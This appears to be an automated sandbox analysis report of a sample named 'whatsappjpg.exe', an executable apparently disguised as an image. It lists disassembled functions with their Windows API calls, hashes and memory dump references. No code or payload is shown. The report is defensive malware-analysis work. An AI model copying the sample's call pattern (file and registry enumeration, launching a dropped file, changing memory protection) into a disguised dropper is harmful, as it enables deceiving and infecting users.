Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E

Function 0040219E Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406236
Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242

lstrlenW.KERNEL32 ref: 004021DE
lstrlenW.KERNEL32(00000000), ref: 004021E9
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59

Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A

Function 00401DF3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens,?), ref: 00401E3D

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 00401E26

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 587946157-3974840194
Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629

Function 10002870 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 1000292F
GetLastError.KERNEL32 ref: 10002A36

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95

Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A

Function 00405A3B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00405A94
GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00405AA4

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E

Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729

Function 00402C42 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768

Function 00405BD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 10002796 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19

Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
